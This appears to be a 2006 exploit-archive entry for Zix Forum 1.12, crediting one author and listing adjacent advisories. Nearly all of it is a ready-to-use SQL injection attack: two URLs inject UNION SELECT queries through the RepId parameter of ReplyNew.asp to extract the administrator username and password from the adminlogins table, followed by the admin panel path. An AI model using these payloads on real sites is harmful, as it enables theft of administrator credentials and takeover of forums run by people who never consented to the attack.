[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Zix Forum <= 1.12 (RepId) Remote SQL Injection Vulnerability
# Published : 2006-09-05
# Author : Chironex Fleckeri
# Previous Title : ACGV News <= 0.9.1 (PathNews) Remote File Inclusion Vulnerability
# Next Title : C-News <= 1.0.1 (path) Remote File Inclusion Vulnerability
################################################################################
## ##
## ?ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################
# www.Syue.com [2006-09-05]